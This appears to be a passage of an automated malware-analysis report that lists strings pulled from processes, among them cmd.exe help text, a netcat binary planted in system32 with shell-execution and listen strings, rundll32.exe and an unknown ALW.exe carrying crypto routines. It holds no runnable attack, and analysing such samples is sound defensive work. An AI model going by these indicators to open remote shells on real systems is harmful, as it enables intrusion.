Extensions</pre><pre>%%CMDCMDLINE%% - expands to the original command line that invoked the</pre><pre>If Command Extensions are enabled the SHIFT command supports</pre><pre>control is passed to the statement after the label specified. You must</pre><pre>%%4 %%5 ...)</pre><pre>CMD /? for details.</pre><pre>This works because on old versions of CMD.EXE, SETLOCAL does NOT</pre><pre>command execution.</pre><pre>non-executable files may be invoked through their file association just</pre><pre>by typing the name of the file as a command. (e.g. WORD.DOC would</pre><pre>launch the application associated with the .DOC file extension).</pre><pre>When executing an application that is a 32-bit GUI application, CMD.EXE</pre><pre>the command prompt. This new behavior does NOT occur if executing</pre><pre>When executing a command line whose first token is the string "CMD "</pre><pre>without an extension or path qualifier, then "CMD" is replaced with</pre><pre>the value of the COMSPEC variable. This prevents picking up CMD.EXE</pre><pre>When executing a command line whose first token does NOT contain an</pre><pre>extension, then CMD.EXE uses the value of the PATHEXT</pre><pre>.COM;.EXE;.BAT;.CMD</pre><pre>When searching for an executable, if there is no match on any extension,</pre><pre>If Command Extensions are enabled, and running on the Windows XP</pre><pre>forms of the FOR command are supported:</pre><pre>Walks the directory tree rooted at [drive:]path, executing the FOR</pre><pre>passes the first blank separated token from each line of each file.</pre><pre>is a quoted string which contains one or more keywords to specify</pre><pre>different parsing options. The keywords are:</pre><pre>be passed to the for body for each iteration.</pre><pre>where a back quoted string is executed as a</pre><pre>FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k</pre><pre>would parse each line in myfile.txt, ignoring lines that begin with</pre><pre>a semicolon, passing the 2nd and 3rd token from each line to the for</pre><pre>line, which is passed to a child CMD.EXE and the output is captured</pre><pre>IF CMDEXTVERSION number command</pre><pre>The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is</pre><pre>CMDEXTVERSION conditional is never true when Command Extensions are</pre><pre>%%CMDCMDLINE%% will expand into the original command line passed to</pre><pre>CMD.EXE prior to any processing by CMD.EXE, provided that there is not</pre><pre>already an environment variable with the name CMDCMDLINE, in which case</pre><pre>%%CMDEXTVERSION%% will expand into a string representation of the</pre><pre>current value of CMDEXTVERSION, provided that there is not already</pre><pre>an environment variable with the name CMDEXTVERSION, in which case you</pre><pre>under Windows XP, as command line editing is always enabled.</pre><pre>CMD.EXE was started with the above path as the current directory.</pre><pre>UNC paths are not supported. Defaulting to Windows directory.</pre><pre>CMD does not support UNC paths as current directories.</pre><pre>UNC paths not supported for current directory. Using</pre><pre>to create temporary drive letter to support UNC current</pre><pre>Missing operand.</pre><pre>Missing operator.</pre><pre>The COMSPEC environment variable does not point to CMD.EXE.</pre><pre>The FAT File System only support Last Write Times</pre><pre>of a batch script is reached, an implied ENDLOCAL is executed for any</pre><pre>application execution.</pre><pre>The switch /Y may be present in the COPYCMD environment variable.</pre><pre>to prompt on overwrites unless MOVE command is being executed from</pre><pre>when CMD.EXE started. This value either comes from the current console</pre><pre>The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute</pre><b>nc.exe_1932:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.idata</pre><pre>.BENu</pre><pre>user32.dll</pre><pre>WaitForMultipleObjects error: %s</pre><pre>Failed to create ReadShell session thread, error = %s</pre><pre>Failed to execute shell</pre><pre>Failed to create shell stdin pipe, error = %s</pre><pre>Failed to create shell stdout pipe, error = %s</pre><pre>Failed to execute shell, error = %s</pre><pre>SessionReadShellThreadFn exitted, error = %s</pre><pre>%s: option `%s' requires an argument</pre><pre>%s: option `%c%s' doesn't allow an argument</pre><pre>%s: option `--%s' doesn't allow an argument</pre><pre>%s: invalid option -- %c</pre><pre>%s: illegal option -- %c</pre><pre>%s: option requires an argument -- %c</pre><pre>%s: unrecognized option `%c%s'</pre><pre>%s: unrecognized option `--%s'</pre><pre>%s: option `%s' is ambiguous</pre><pre>sent %d, rcvd %d</pre><pre>VERNOTSUPPORTED</pre><pre>AFNOSUPPORT</pre><pre>PFNOSUPPORT</pre><pre>SOCKTNOSUPPORT</pre><pre>PROTONOSUPPORT</pre><pre>MSGSIZE</pre><pre>Hmalloc %d failed</pre><pre>DNS fwd/rev mismatch: %s != %s</pre><pre>Warning: forward host lookup failed for %s: h_errno %d</pre><pre>%s: inverse host lookup failed: h_errno %d</pre><pre>Warning: inverse host lookup failed for %s: h_errno %d</pre><pre>%s: forward host lookup failed: h_errno %d</pre><pre>Can't parse %s as an IP address</pre><pre>Warning: port-bynum mismatch, %d != %d</pre><pre>loadports: bogus values %d, %d</pre><pre>loadports: no block?!</pre><pre>Can't grab %s:%d with bind</pre><pre>retrying local %s:%d</pre><pre>connect to [%s] from %s [%s] %d</pre><pre>invalid connection to [%s] from %s [%s] %d</pre><pre>] %d ...</pre><pre>UDP listen needs -p arg</pre><pre>udptest first write failed?! errno %d</pre><pre>Preposterous Pointers: %d, %d</pre><pre>sent %d, rcvd %d</pre><pre>%s [%s] %d (%s)</pre><pre>%s [%s] %d (%s) open</pre><pre>no port[s] to connect to</pre><pre>invalid port %s</pre><pre>can't open %s</pre><pre>invalid wait-time %s</pre><pre>invalid local port %s</pre><pre>invalid interval time %s</pre><pre>invalid hop pointer %d, must be multiple of 4 <= 28</pre><pre>Cmd line:</pre><pre>port numbers can be individual or ranges: m-n [inclusive]</pre><pre>UDP mode</pre><pre>delay interval for lines sent, ports scanned</pre><pre>-p port</pre><pre>local port number</pre><pre>randomize local and remote ports</pre><pre>inbound program to exec [dangerous!!]</pre><pre>nc [-options] hostname port[s] [ports] ...</pre><pre>nc -l -p port [options] [hostname] [port]</pre><pre>c:\windows\system32\nc.exe</pre><pre>DisconnectNamedPipe</pre><pre>CreatePipe</pre><pre>PeekNamedPipe</pre><pre>KERNEL32.dll</pre><pre>WSOCK32.dll</pre><pre>GetCPInfo</pre><b>rundll32.exe_1532:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>msvcrt.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>IMAGEHLP.dll</pre><pre>rundll32.pdb</pre><pre>.....eZXnnnnnnnnnnnn3</pre><pre>....eDXnnnnnnnnnnnn3</pre><pre>...eDXnnnnnnnnnnnn,</pre><pre>.eDXnnnnnnnnnnnn,</pre><pre>%Xnnnnnnnnnnnnnnn1</pre><pre>O3$dS7"%U9</pre><pre>.manifest</pre><pre>5.1.2600.5512 (xpsp.080413-2105)</pre><pre>RUNDLL.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>YThere is not enough memory to run the file %s.</pre><pre>Please close other windows and try again.</pre><pre>9The file %s or one of its components could not be opened.</pre><pre>0The file %s or one of its components cannot run.</pre><pre>MThe file %s or one of its components requires a different version of Windows.</pre><pre>UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"</pre><pre>Error in %s</pre><pre>Missing entry:%s</pre><pre>Error loading %s</pre><b>ALW.exe_1160:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>udPh</pre><pre>PSSSSSSh</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>.EKSWU</pre><pre>FTPG</pre><pre>FTPj</pre><pre>FtPS</pre><pre>=KNILw.tT=RCNEw</pre><pre>_0 _8 _4;_,</pre><pre>SHA1 block transform for x86, CRYPTOGAMS by <appro></appro></pre><pre>SHA256 block transform for x86, CRYPTOGAMS by <appro></appro></pre><pre>DlSHA512 block transform for x86, CRYPTOGAMS by <appro></appro></pre><pre>Montgomery Multiplication for x86, CRYPTOGAMS by <appro></appro></pre><pre>6-9'6-9'</pre><pre>$6.:$6.:</pre><pre>*?#1*?#1</pre><pre>>8$4,8$4,</pre><pre>AES for x86, CRYPTOGAMS by <appro></appro></pre><pre>Camellia for x86 by <appro></appro></pre><pre>RC4 for x86, CRYPTOGAMS by <appro></appro></pre><pre>FRegDeleteKeyExW</pre><pre>MARGIN-BOTTOM: 11px; BORDER-STYLE: solid; BORDER-COLOR: #DFDFE5; BORDER-WIDTH: 2px; BACKGROUND-COLOR: #DFDFE5; }H2 { COLOR: black; BACKGROUND-COLOR: #FFFFF; FONT-SIZE: 12pt; FONT-WEIGHT: normal; MARGIN-BOTTOM: 0px; MARGIN-TOP: 10px;}</pre></pre></p%C></pre></q3></pre>